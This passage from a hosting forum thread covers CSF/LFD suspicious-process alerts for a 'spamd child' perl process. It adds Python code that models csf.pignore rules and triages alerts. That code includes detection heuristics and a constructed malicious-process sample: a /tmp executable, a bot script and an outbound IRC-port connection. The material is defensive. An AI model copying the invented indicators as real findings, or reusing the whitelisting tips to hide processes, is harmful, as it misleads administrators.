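    exe: rule for the original path no longer covers it and the process is reported;
    only a pexe: regex written to cover the tagged name (as in the thread) ignores it."""
    if proc.uptime < pt_usertime:
        return None
    deleted = proc.exe.endswith(" (deleted)")
    exe_name = proc.exe if pt_deleted else proc.exe.replace(" (deleted)", "")
    for rule in rules:
        if _matches(rule, proc, exe_name):
            return None
    if deleted and pt_deleted:
        return "pid %d (%s): executable deleted: %s" % (proc.pid, proc.user, proc.exe)
    return "pid %d (%s): running %ds, exe=%s cmd=%r" % (
        proc.pid, proc.user, proc.uptime, exe_name, proc.cmdline)


if __name__ == "__main__":
    rules = parse_pignore(PIGNORE_TEXT)
    for p in (SPAMD, AWSTATS, FTPD, UNKNOWN):
        print(p.pid, report(p, rules) or "ignored")
```

Run as is, the spamd child and awstats records are silenced by the two quoted rules, the deleted pure-ftpd binary is reported until either a pexe: rule covering the tagged name is added or PT_DELETED is set to 0, and the perl script under /tmp is reported because nothing covers it. That last case is the point of post #10's caveat: a cmd: rule only matches the command line, and the command line is the one field the report itself says is often faked, so an ignore rule should be written only after the executable and open files have been checked.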

  22. #22
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Quote Originally Posted by logicsupport
    You need to edit csf.pignore to filter out legitimate processes; otherwise any user process that exceeds the time you have set up will cause LFD to flag the process as suspicious.

    If you want to ignore them you'll need to add something like the following to csf.pignore and then restart lfd:

    cmd : spamd child

    The above is one of the methods used, although I won't suggest it, as they're not always false positives.

    lfd simply reports the information it finds for a process; we need to put in extra effort to actually find out if it's a false positive or not.

  23. #23
    Join Date
    Aug 2009
    Posts
    43
    Quote Originally Posted by queen_leonia
    Don't you think this is strange..
    When I do a ps to see all processes for each user on my host,
    only user belidonk shows something different.

    Here are just a couple of accounts on my host. But I do it for all accounts, with the assumption that all accounts are using pop3 right now, webmail, have been accessed by internet users, etc.
    root@fire [/tmp]# ps -a -u o****
    PID TTY TIME CMD
    667 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u belidonk
    PID TTY TIME CMD
    829 pts/0 00:00:00 ps
    15224 ? 00:00:04 imapd
    26558 ? 00:00:00 pop3d
    71238 ? 00:00:00 gam_server
    root@fire [/tmp]# ps -a -u b****
    PID TTY TIME CMD
    844 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u a******
    PID TTY TIME CMD
    933 pts/0 00:00:00 ps

    Why does belidonk show gam_server, pop3d, imapd? The belidonk user told me that he just runs a usual php script.. nothing to do with gam_server, etc.. Please, some advice?

    For the strange processes which are owned by belidonk, I tried uninstalling gam_server from WHM (because my clients don't use it either) and it works. The process list shows only the ps when I do 'ps -a -u belidonk', the same as the other accounts.

    Thank you

  24. #24
    Join Date
    Jul 2009
    Location
    Manila
    Posts
    301
    Quote Originally Posted by queen_leonia
    @JWeb2:
    Sorry, no offense, JWeb2.. But I think this is what the forum was created for..
    to help each other and post information related to the questions.
    If everything can be answered with the statement "Hire a Pro".. then what does a pro do if he/she gets stuck on one issue?

    thank you.
    Yes, it may be true that this forum was created to help other people, but do not expect that we can do all the stuff for you. If you don't even know where to start then you will get into more trouble in the future.

    A pro might ask something here for assistance if he's stuck, but at least he knows basic management. No offense, but you look like you don't even know where to start.

    If you start troubleshooting your server on your own without really understanding what you are doing and why you need to do it, then you will for sure run into more problems in the future.

  25. #25
    Quote Originally Posted by queen_leonia
    Suspicious Process Running under user in my host
    Time: Fri Sep 11 11:34:27 2009 +0700
    PID: 20893
    Account: belidonk
    Uptime: 1146 seconds


    Executable:

    /usr/local/bin/perl


    Command Line (often faked in exploits):

    spamd child


    Network connections by the process (if any):

    tcp: 127.0.0.1:783 -> 0.0.0.0:0
    tcp: 127.0.0.1:783 -> 127.0.0.1:33537
    udp: 202.43.169.146:40156 -> 202.43.169.146:53


    Files open by the process (if any):

    /dev/null
    /dev/null
    /dev/null
    /usr/bin/spamd
    /usr/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/VBounce.pm
    /tmp/.spamassassin20893VJRkFEtmp
    /tmp/.spamassassin208932TMd9Ktmp


    Memory maps by the process (if any):

    005aa000-0069e000 r-xp 00000000 fd:00 26804459 /lib/libdb-4.3.so
    0069e000-006a1000 rwxp 000f3000 fd:00 26804459 /lib/libdb-4.3.so
    0089b000-0089d000 r-xp 00000000 fd:00 26805617 /lib/libutil-2.5.so
    0089d000-0089e000 r-xp 00001000 fd:00 26805617 /lib/libutil-2.5.so
    0089e000-0089f000 rwxp 00002000 fd:00 26805617 /lib/libutil-2.5.so
    00b3e000-00b58000 r-xp 00000000 fd:00 26805086 /lib/ld-2.5.so
    00b58000-00b59000 r-xp 00019000 fd:00 26805086 /lib/ld-2.5.so
    00b59000-00b5a000 rwxp 0001a000 fd:00 26805086 /lib/ld-2.5.so
    00b5c000-00c9a000 r-xp 00000000 fd:00 26805104 /lib/libc-2.5.so
    00c9a000-00c9c000 r-xp 0013e000 fd:00 26805104 /lib/libc-2.5.so
    00c9c000-00c9d000 rwxp 00140000 fd:00 26805104 /lib/libc-2.5.so
    00c9d000-00ca0000 rwxp 00c9d000 00:00 0
    00ca2000-00ca4000 r-xp 00000000 fd:00 26805105 /lib/libdl-2.5.so
    00ca4000-00ca5000 r-xp 00001000 fd:00 26805105 /lib/libdl-2.5.so
    00ca5000-00ca6000 rwxp 00002000 fd:00 26805105 /lib/libdl-2.5.so
    00ca8000-00cbb000 r-xp 00000000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbb000-00cbc000 r-xp 00012000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbc000-00cbd000 rwxp 00013000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbd000-00cbf000 rwxp 00cbd000 00:00 0
    00cc1000-00ce6000 r-xp 00000000 fd:00 26805573 /lib/libm-2.5.so
    00ce6000-00ce7000 r-xp 00024000 fd:00 26805573 /lib/libm-2.5.so
    00ce7000-00ce8000 rwxp 00025000 fd:00 26805573 /lib/libm-2.5.so
    00d61000-00d68000 r-xp 00000000 fd:00 26805604 /lib/librt-2.5.so
    00d68000-00d69000 r-xp 00006000 fd:00 26805604 /lib/librt-2.5.so
    00d69000-00d6a000 rwxp 00007000 fd:00 26805604 /lib/librt-2.5.so
    00d6c000-00d7f000 r-xp 00000000 fd:00 26805599 /lib/libnsl-2.5.so
    00d7f000-00d80000 r-xp 00012000 fd:00 26805599 /lib/libnsl-2.5.so
    00d80000-00d81000 rwxp 00013000 fd:00 26805599 /lib/libnsl-2.5.so
    00d81000-00d83000 rwxp 00d81000 00:00 0
    00d85000-00d8e000 r-xp 00000000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8e000-00d8f000 r-xp 00008000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8f000-00d90000 rwxp 00009000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d90000-00db7000 rwxp 00d90000 00:00 0
    08048000-08126000 r-xp 00000000 fd:00 59322714 /usr/local/bin/perl
    08126000-0812a000 rwxp 000dd000 fd:00 59322714 /usr/local/bin/perl
    0812a000-0812c000 rwxp 0812a000 00:00 0
    0835f000-0a2cc000 rwxp 0835f000 00:00 0 [heap]
    b76ee000-b77af000 rwxp b76ee000 00:00 0
    b7870000-b7931000 rwxp b7d4c000 00:00 0
    b7931000-b79f2000 rwxp b7931000 00:00 0
    b79f2000-b7ab3000 rwxp b7ea2000 00:00 0
    b7b4b000-b7d4c000 rwxp b7b4b000 00:00 0
    b7df7000-b7ea2000 rwxp b7df7000 00:00 0
    b7f4d000-b7f52000 r-xp 00000000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f52000-b7f53000 rwxp 00004000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f53000-b7f58000 r-xp 00000000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f58000-b7f59000 rwxp 00004000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f59000-b7f63000 r-xp 00000000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f63000-b7f64000 rwxp 00009000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f64000-b7f6d000 r-xp 00000000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6d000-b7f6e000 r-xp 00008000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6e000-b7f6f000 rwxp 00009000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f71000-b7f74000 r-xp 00000000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f74000-b7f75000 rwxp 00002000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f75000-b7f79000 r-xp 00000000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f79000-b7f7a000 rwxp 00003000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f7a000-b7f7d000 r-xp 00000000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7d000-b7f7e000 rwxp 00002000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7e000-b7f83000 r-xp 00000000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f83000-b7f84000 rwxp 00004000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f84000-b7f86000 r-xp 00000000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f86000-b7f87000 rwxp 00001000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f87000-b7f88000 r-xp 00000000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f88000-b7f89000 rwxp 00001000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f89000-b7f92000 r-xp 00000000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f92000-b7f93000 rwxp 00008000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f93000-b7f97000 r-xp 00000000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f97000-b7f98000 rwxp 00003000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f98000-b7f9b000 r-xp 00000000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9b000-b7f9c000 rwxp 00002000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9c000-b7f9e000 r-xp 00000000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9e000-b7f9f000 rwxp 00001000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9f000-b7fb5000 r-xp 00000000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb5000-b7fb6000 rwxp 00015000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb6000-b7fb9000 r-xp 00000000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fb9000-b7fba000 rwxp 00002000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fba000-b7fbe000 r-xp 00000000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbe000-b7fbf000 rwxp 00003000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbf000-b7fc2000 rwxp b7fbf000 00:00 0
    b7fc2000-b7fc3000 r-xp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc3000-b7fc4000 rwxp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc4000-b7fc7000 r-xp 00000000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc7000-b7fc8000 rwxp 00002000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc8000-b7fcc000 r-xp 00000000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcc000-b7fcd000 rwxp 00003000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcd000-b7fce000 r-xp b7fcd000 00:00 0 [vdso]
    bfba5000-bfbd3000 rw-p bffd1000 00:00 0 [stack]

    Guys, any idea what I should do? I have killed the PID.
    Thank you.

    There is no problem with the above process; it's just a warning from CSF about SpamAssassin.
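The reply above calls this alert a CSF Process Tracking false positive for a SpamAssassin spamd child. The script below is an added example (not code from the thread, from CSF or from SpamAssassin) showing how to check that claim from the alert text itself instead of trusting the command line, which the alert's own heading marks as "often faked in exploits": the open files, the executable path and the sockets are reported by the kernel and are much harder to forge. The spamd profile in the code (perl running /usr/bin/spamd with SpamAssassin modules open and a listener only on 127.0.0.1:783, spamd's default port) and the rules are assumptions for this example; the second, malicious-looking alert is constructed.

```python
"""Triage a CSF/LFD "Suspicious process" alert before reaching for kill(1).
Added example, not code from the thread or from CSF: it parses the alert text in
the layout shown above and checks whether the process is consistent with a
SpamAssassin spamd child. The profile and rules are this example's assumptions."""
import re

# Constructed sample, built from the fields of the alert above (blank lines dropped).
ALERT = """\
PID: 20893
Executable:
/usr/local/bin/perl
Command Line (often faked in exploits):
spamd child
Network connections by the process (if any):
tcp: 127.0.0.1:783 -> 0.0.0.0:0
tcp: 127.0.0.1:783 -> 127.0.0.1:33537
udp: 202.43.169.146:40156 -> 202.43.169.146:53
Files open by the process (if any):
/usr/bin/spamd
/usr/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/VBounce.pm
/tmp/.spamassassin20893VJRkFEtmp
"""

# Constructed counter-example: same faked command line, but the kernel-reported facts
# (exe path, open files, sockets) do not back it up.
BAD_ALERT = """\
PID: 4242
Executable:
/tmp/.x/perl
Command Line (often faked in exploits):
spamd child
Network connections by the process (if any):
tcp: 202.43.169.146:51234 -> 198.51.100.7:6667
Files open by the process (if any):
/tmp/.x/bot.pl
"""

SECTION_RE = re.compile(
    r"^(Executable|Command Line[^:]*|Network connections[^:]*|Files open[^:]*):\s*$")
CONN_RE = re.compile(r"^(tcp|udp):\s*([\d.]+):(\d+)\s*->\s*([\d.]+):(\d+)$")

# Assumed profile of a genuine spamd child: perl running /usr/bin/spamd with
# SpamAssassin modules open, listening only on 127.0.0.1:783 (spamd's default port).
SPAMD_PROFILE = {"cmdline": "spamd child", "script": "/usr/bin/spamd",
                 "modules": "/Mail/SpamAssassin/", "port": 783}


def parse_alert(text):
    """Return (header dict, {section: [lines]}); section keys are the first word."""
    header, sections, current = {}, {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:                                   # "Command Line (...)" -> "command"
            current = m.group(1).split()[0].lower()
            sections[current] = []
        elif current is None:
            key, _, val = line.partition(":")
            header[key.strip().lower()] = val.strip()
        else:
            sections[current].append(line)
    return header, sections


def triage(text, profile=SPAMD_PROFILE):
    """Return (verdict, findings); no findings means the alert matches the profile."""
    _, sec = parse_alert(text)
    exe = (sec.get("executable") or [""])[0]
    cmd = " ".join(sec.get("command", []))
    files = sec.get("files", [])
    findings = []
    # The command line is attacker-controlled (CSF says so itself), so corroborate
    # it with what the kernel reports: the script and its modules must be open.
    if cmd == profile["cmdline"] and profile["script"] not in files:
        findings.append(f"cmdline claims spamd but {profile['script']} is not open")
    if not any(profile["modules"] in f for f in files):
        findings.append("no SpamAssassin modules open")
    if exe.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")):
        findings.append(f"executable runs from a scratch directory: {exe}")
    for m in filter(None, map(CONN_RE.match, sec.get("network", []))):
        proto, laddr, lport, raddr, rport = m.groups()
        lport, rport = int(lport), int(rport)
        if raddr == "0.0.0.0" and rport == 0:                  # listening socket
            if laddr != "127.0.0.1" or lport != profile["port"]:
                findings.append(f"unexpected listener {proto} {laddr}:{lport}")
        elif lport == profile["port"] or raddr.startswith("127."):
            continue                                           # accepted local client
        elif rport != 53:                                      # DNS lookups are normal
            findings.append(f"outbound {proto} to {raddr}:{rport}")
    return ("likely spamd false positive" if not findings else "investigate"), findings


def pignore_line(text):
    """csf.pignore entry that silences this alert by command line (cmd: form)."""
    return "cmd:" + " ".join(parse_alert(text)[1].get("command", []))


if __name__ == "__main__":
    for name, alert in (("thread alert", ALERT), ("counter-example", BAD_ALERT)):
        print(name, *triage(alert), sep=": ")
    print("csf.pignore:", pignore_line(ALERT))
```

Two practical notes. First, whitelist narrowly: an `exe:/usr/local/bin/perl` line in csf.pignore would silence every Perl process under every account, while `cmd:spamd child` covers only this command line (restart lfd after editing the file); since the command line is exactly what an attacker can fake, treat a `cmd:` entry as trading a noisy alert for a small blind spot rather than as a fix. Second, the process shows up under a customer account because spamd started as root switches each child to the user whose mail it is scanning; that is expected behaviour and not by itself a sign of compromise.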
